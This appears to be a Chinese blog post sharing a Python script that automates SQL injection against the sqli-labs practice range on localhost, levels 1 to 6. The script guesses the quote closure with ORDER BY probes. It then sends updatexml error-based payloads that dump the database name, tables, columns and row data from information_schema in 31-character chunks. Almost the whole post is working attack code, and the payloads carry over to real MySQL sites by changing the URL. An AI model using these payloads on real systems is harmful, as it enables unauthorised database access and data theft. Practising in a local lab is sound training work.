写了个Py脚本 关于 Sql-labs的 xpath注入

order by : 利用 order by 语句 ，相当于判断 闭合

updatexml ：利用xpath注入语句，打开网页来看结果

all ：相当于上面2个模块一起用

关卡为 sqllab 靶场 的关卡

代码如下:

import time
import webbrowser
import sys

mokuai = {
    '1 (order by)',
    '2 (updatexml)',
    '3 (all)'
}

for mok in mokuai:
    print(mok)

b1 = input("---请输入模块(最前方数字)--- :")

gka = {
    '1',
    '2',
    '3',
    '4',
    '5',
    '6'
}

for gk in gka:
    print(gk)

s = input("---请输入关卡--- :")

zifu = {
        "'",
        "')",
        '")',
        '"',
        "'))",
        '"))'
    }

yujua = {
        'database()',
        'group_concat(table_name) from information_schema.tables where table_schema="xxx"',
        'group_concat(column_name) from information_schema.columns where table_schema="xxx" and table_name="xxx"',
        'group_concat(xxx,0x7e,xxx) from xxx',
        'group_concat(xxx) from xxx'
    }

sys.path.append("libs")
if b1 == '1':

    for zi in zifu:
        aaa = "http://127.0.0.1/sqllab/Less-" + s + "/?id=1" + zi + "order by 1200 --+"
        bbb = "http://127.0.0.1/sqllab/Less-" + s + "/?id=1" + zi + "order by 1 --+"
        webbrowser.open(aaa)
        print(webbrowser.get())
        webbrowser.open(bbb)
        print(webbrowser.get())

elif b1 == '2':
    a1 = input("---请输入闭合--- :")

    for i in range(1, 100):
        for j in yujua:
            print(j)
        print('------------------------------------------------------')
        yuju = input("(输入 0 停止)请输入sql注入语句 :")
        if yuju == '0':
            exit()
        ccc = "http://127.0.0.1/sqllab/Less-" + s + "/?id=1" + a1 + " and updatexml(1,concat(0x5e,(substr((select " + yuju + "),1)),0x5e),1) --+"
        webbrowser.open(ccc)
        print(webbrowser.get())
        ccc = "http://127.0.0.1/sqllab/Less-" + s + "/?id=1" + a1 + " and updatexml(1,concat(0x5e,(substr((select " + yuju + "),32)),0x5e),1) --+"
        webbrowser.open(ccc)
        print(webbrowser.get())
        ccc = "http://127.0.0.1/sqllab/Less-" + s + "/?id=1" + a1 + " and updatexml(1,concat(0x5e,(substr((select " + yuju + "),63)),0x5e),1) --+"
        webbrowser.open(ccc)
        print(webbrowser.get())
        ccc = "http://127.0.0.1/sqllab/Less-" + s + "/?id=1" + a1 + " and updatexml(1,concat(0x5e,(substr((select " + yuju + "),94)),0x5e),1) --+"
        webbrowser.open(ccc)
        print(webbrowser.get())
        print('------------------------------------------------------')

else:
    for zi in zifu:
        aaa = "http://127.0.0.1/sqllab/Less-" + s + "/?id=1" + zi + "order by 1200 --+"
        bbb = "http://127.0.0.1/sqllab/Less-" + s + "/?id=1" + zi + "order by 1 --+"
        webbrowser.open(aaa)
        print(webbrowser.get())
        webbrowser.open(bbb)
        print(webbrowser.get())
    a1 = input("---请输入闭合--- :")

    for i in range(1, 100):
        for j in yujua:
            print(j)
        print('------------------------------------------------------')
        yuju = input("(输入 0 停止)请输入sql注入语句 :")
        if yuju == '0':
            exit()
        ccc = "http://127.0.0.1/sqllab/Less-" + s + "/?id=1" + a1 + " and updatexml(1,concat(0x5e,(substr((select " + yuju + "),1)),0x5e),1) --+"
        webbrowser.open(ccc)
        print(webbrowser.get())
        ccc = "http://127.0.0.1/sqllab/Less-" + s + "/?id=1" + a1 + " and updatexml(1,concat(0x5e,(substr((select " + yuju + "),32)),0x5e),1) --+"
        webbrowser.open(ccc)
        print(webbrowser.get())
        ccc = "http://127.0.0.1/sqllab/Less-" + s + "/?id=1" + a1 + " and updatexml(1,concat(0x5e,(substr((select " + yuju + "),63)),0x5e),1) --+"
        webbrowser.open(ccc)
        print(webbrowser.get())
        ccc = "http://127.0.0.1/sqllab/Less-" + s + "/?id=1" + a1 + " and updatexml(1,concat(0x5e,(substr((select " + yuju + "),94)),0x5e),1) --+"
        webbrowser.open(ccc)
        print(webbrowser.get())
        print('------------------------------------------------------')